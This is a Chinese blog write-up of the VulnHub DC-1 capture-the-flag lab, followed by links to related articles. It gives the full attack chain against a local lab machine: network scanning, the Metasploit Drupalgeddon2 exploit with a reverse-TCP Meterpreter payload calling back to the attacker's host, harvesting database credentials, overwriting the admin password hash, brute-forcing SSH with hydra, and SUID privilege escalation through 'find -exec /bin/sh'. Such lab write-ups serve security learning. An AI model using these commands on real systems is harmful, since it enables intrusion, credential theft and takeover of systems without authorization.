vulnhub-DC系列通关记DC1靶机渗透
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
目录
flag1
信息收集
漏洞利用
后渗透
flag2
flag3
flag4
最终flag
DC1靶机:链接: https://pan.baidu.com/s/1vtl4H4MKF9dqMjVxS0H4WA 密码: r5eg
靶机汇总:https://blog.csdn.net/qq_35258210/article/details/112465795
本次学习参考文章:https://blog.csdn.net/weixin_44288604/article/details/108027062
本次学习参考视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268
该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062
这张流程图做得很好借来用用。如有侵权请告知删除
flag1
首先我们在启动DC1靶机后进入到系统只显示登录界面,除此在无其他消息
但是我们并不知道username、passwrod
好吧,战斗的号角已经吹响。。
信息收集
这里没有其它信息,因为是在本地搭建的靶机mac地址应该就是我们唯一的线索了,我们查看该靶机的MAC地址
然后在kali里使用该命令
arp-scan 192.168.78.0/24
探测该网段存活机主,当然这要你的虚拟机网络适配器使用的是NAT模式,这样才能默认和kali同一网段(我不知道你们的,但我的是这样的)
知道DC1靶机的ip是192.168.78.147后对该ip使用nmap进行端口扫描
nmap -P 192.168.78.147
这里需要注意的是P需要大写,-P默认只扫描1-1000范围里的端口
发现该靶机开放了80端口,那我们在浏览器输入这个ip试试,发现存在网页,但是要输入账号密码登录,我们又没有,那么我们继续收集信息
使用火狐浏览器插件Wappalyzer看到该网站使用的CMS(网站内容管理系统)
- 什么是Drupal?
- Drupal是国外三大CMS之一
- Drupal、WordPerss、joomla
这里在url里输入
192.168.78.147/robots.txt
可以看到很多目录
robots文件简单介绍:
我们在查看其它目录文件
UPGRADE.txt
这个文件可以看到当前Drupal的version是7.x的
这个UPGRADE.txt文件应该是drupal有新版本了,提示你去更新版本
我们使用google hacking下该版本有没有Nday漏洞可利用,漏洞很多
这里我们在msfconsole漏洞库里搜索Drupal7的漏洞
msf6 > search drupal
发现这里搜索出好几个drupal的Nday利用模块,还有个19年,这里我们使用18年这个
漏洞利用
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
1、配置你要利用的漏洞模块
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info
2、查看该模块的详细介绍
影响范围7.x、8.x,巴拉巴拉一堆下面还有很多介绍
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload空格键+Tab键*2
3、显示该模块的payload
4、我们使用这个,反弹会话连接
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
5、查看下需要set的参数
- RHOSTS,设置目标ip地址
- LHOST 192.168.78.138 本机(攻击机)的ip地址自动设置好了
- LPORT 4444 连接会话回弹到该端口
6、设置目标IP地址
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.78.147
后渗透
7、开始攻击
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
成功与目标机器连接
拿下了目标机器,那么我们开始找flag1吧
meterpreter > pwd
查看我们当前处在什么目录下
meterpreter > dir
列出当前目录列表
这里看到有个flag1文件
meterpreter > cat flag1.txt
查看flag1.txt的内容
这里看到提示我们需要一个配置文件
思路:既然是web应用,一般都有数据库,那么数据库的账号密码应该是以明文的方式写在脚本里的
听说配置文件在这个目录里
meterpreter > cd sites
进入该目录
meterpreter > ls
列出当前目录的列表
meterpreter > cd default
meterpreter > ls
网站的配置文件settings.php
meterpreter > cat settings.php
flag2
这里找到了flag2,这里找到了mysql的username、passwd
有个mysql的账号密码,我们试着去登录mysql
array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ),
连接到webshell,并查看当前用户权限是www-data
因为目标机器(DC1靶机)是linux操作系统的,所以使用linux命令
这里我在渗透的时候漏了一个思路,我应该先看下,该主机是否开启mysql服务,借用大兄弟一张图
使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
进入交互式shell后登录mysql,成功登录
mysql> show databases;
显示当前所有库,我们在前面查看该网站配置文件时知道了该网站使用的是这个库drupaldb
mysql> use drupaldb
选择drupaldb库
mysql> show tables;
显示该库的所有表
这里截图没截全,下面有一个users表
mysql> select * from users\G
查询users表中的所有字段
\G表示将查询结果进行按列打印,可以使每个字段打印到单独的行
发现users中有个uid为1的admin用户,密码经过了加密
既然密码加密了,存在一定破解难度,那就修改掉吧,但是数据库密码是以密文存储的,所以我们需要先调用一个生成密文的脚本
先退出数据库
这里脚本在/var/www目录下,我这在根目录所以先进到该目录
php scripts/password-hash.sh passer
$S$DufRdYqo9RxRWdsHNGV/jmXCvOi6V2osGDp0MswpBjT532ExnrIo
生成了我们定义的密码密文后,登录mysql
修改admin的密码
update users set pass="$S$DufRdYqo9RxRWdsHNGV/jmXCvOi6V2osGDp0MswpBjT532ExnrIo" where uid=1;
admin密码修改成功后,我们就可以去网站上登录啦
flag3
登录成功后,导航栏点第一个发现flag3
点击flag3后
这里flag3的提示愣是没理解,参考了其他博客
打印 /etc/passwd下的内容
www-data@DC-1:/var/www$ cat /etc/passwd
这里发现有flag4,这里我学艺不精,要是没参考其他资料,愣是不知道这flag4是个用户名
思路:再回想我们前面扫描端口时发现的除了80端口还有个22端口,ssh默认的端口,说明该主机开启了ssh服务
知道了用户名是flag4但是没有密码也是连接不上的,我们使用hydar工具导入密码字典暴力破解试试
我们使用kali下的自带的字典
kali@kali:~$ hydra -l flag4 -P /usr/share/john/password.lst 192.168.78.147 ssh -vV -f
- -l指定用户名
- -P指定密码字典文件
- -vV爆破一次在终端打印一行
- -f成功爆破密码后,停止爆破
下面那个命令的-p参数要大写P,大写P,大写P指定密码字典文件,小写p是指定密码
kali@kali:~$ hydra -l flag4 -P /usr/share/john/password.lst 192.168.78.147 ssh -vV -f
成功爆破出了flag4的密码后就可以试试连接一下了
flag4
kali@kali:~$ ssh flag4@192.168.78.147
成功连接
ls列出当前目录下的列表,可以看到这个出现了flag4.txt
cat 查看flag4.txt
flag4内容提示,我们可以以相同的方式找到另外一个flag在root目录下,但是,它这个过程不是特别的简单,或许可能是特别简单。差不多就是说方式不单单只有一钟?我的理解大概是这样的
whoami
查看当前用户
cd /root
最终flag
提示没有权限,也就是说flag4并不是root权限
那么我们要想办法提权为root,进入/root目录找到我们的最终flag
提权,老师说可以使用操作系统内核提权,但是内核提权是绝招,绝招是要在没招可用的时候才时候的,绝招并不是必杀,绝招是最后的挣扎~~~。所以我们并不能一上来使用绝招,哈哈哈好吧摊牌了我也不会内核提权呀!
这时候我们查看下该系统是否存在具有SUID标识的命令,SUID标识的命令,是在执行这些具有SUID标识的命令的运行期间会获取root权限
比如bash命令,运行bash命令时有SUID标识,SUID标识会继承root权限,就好比A信任B,B信任C,那么A就可以间接的信任C,信任是具有传递性的
有SUID标识的命令调用B命令运行,SUID标识的命令调用B命令期间SUID标识的命令获取root权限,B命令也获取了root权限
下面这条命令可以查看当前系统有哪些具有SUID标识的命令
find / -perm -4000 2>/dev/null
使用下面这条命令提权,注意这条命令里一个字符不能多也不能少,该空格就空格
find -exec "/bin/sh" \;
最终flag
运行后,执行whoami查看当前用户,可以看到当前用户为root,cd /root,进入root目录,提权成功,才看到有个文件,cat查看,OK,涨姿势了!
当然这要是不参考资料、视频,以我的老底估计flag1都不大好拿,这次渗透,本着学思路,涨姿势的心态学习,虽然边写边学,会学的比较慢,但这样学习,可以逼迫自己不要那么的将就,因为要发到个人博客上,所以就会尽可能的把每个知识点都深入了解一下,加深理解,记忆也比较牢固,而且后面复习时也会因为是自己写的忘了看几眼也比较容易想起来,我很喜欢这种感觉。哈哈哈,如果你看到这了,不妨点个赞,虽然我不奢望这些东西,但也会觉得小惊喜。
-----------------------------No matter young or old, or poor or rich, please don't give up your ardently love
机译,哈哈哈。
我想用不了多久我能自己写一段无差错的英文句子,up
vulnhub-DC系列通关记DC1靶机渗透相关推荐
- 记录一下 DC1靶机渗透
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里). 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.10 ...
- VulnHub DC1靶机渗透测试
1. 说明 虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...
- 【vulnhub】靶机- [DC系列]DC9(附靶机))
主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...
- vulnhub DC系列 DC-8
总结:exim4提权 目录 下载地址 漏洞分析 信息收集 网站爆破 后台webshell 提权 下载地址 DC-8.zip (Size: 379 MB) Download: http://www.fi ...
- vulnhub DC系列 DC-6
总结:wpscan爆破,nmap提权 目录 下载地址 漏洞分析 信息收集 用户和密码爆破 命令执行 方法一: 方法二: 提权 下载地址 DC-6.zip (Size: 619 MB) Download ...
- vulnhub DC系列 DC-2
总结:cewl和wpscan的使用,rbash逃逸,suid提权 下载地址 DC-2.zip (Size: 847 MB) Download: http://www.five86.com/downlo ...
- vulnhub DC系列 DC-4
总结:爆破,teehee提权 目录 下载地址 漏洞分析 信息收集 密码爆破 命令执行 编辑 ssh爆破 提权 下载地址 DC-4.zip (Size: 617 MB) Download: http: ...
- vulnhub DC系列 DC-9
总结:sql注入,端口敲门,覆盖passwd提权 下载地址 DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9 ...
- vulnhub DC系列 DC-3
总结:joomscan工具的使用,cve-2016-4557内核提权或者cve-2021-4034内核提权 下载地址 漏洞分析 信息收集 sql注入 写马 提权 反弹shell 内核提权 cve-20 ...
最新文章
- powerDesign设计随笔
- windows下 网络命令(待续)
- Java OAuth开发包资料
- 滚动容器尺寸变化时候最上方元素位置不变实例页面
- python秒转换成小时分钟秒_新闻联播66分钟,康辉口播22分38秒,零失误
- Spring MVC竟然有5种参数绑定的方式?你知道几种?
- Unity3D 装备系统学习Inventory Pro 2.1.2 基础篇
- 我的世界末日求生系列服务器,末日生存 少年pi
- android 教程实例系列
- 互联网赚钱:一个抖音小项目,分析下,人人都能做
- 有c语言基础自学JAVA要多久,零基础学java需要多久?要先学习C语言吗?
- 查看电脑(服务器)ip地址与名称
- [OHIF-Viewers]医疗数字阅片-医学影像-Module: Panel-自定义面板-中-es6-Object.defineProperty()定义属性...
- 如何修改服务器远程登录密码
- AtCoder Beginner Contest 172 总结
- 2. C++ Visual Studio中同一个项目包含多个有main函数的源文件怎么分别运行?
- 泰拉瑞亚mod鸿蒙方舟,三款高评分的沙盒生存类手游,经典之作泰拉瑞亚你有玩过吗?...
- python autoit打开软件_Python+AutoIt实现界面工具开发
- 服务器文件共享不同用户互访设置,samba配置_samba文件共享服务配置详解
- Arbitrage题解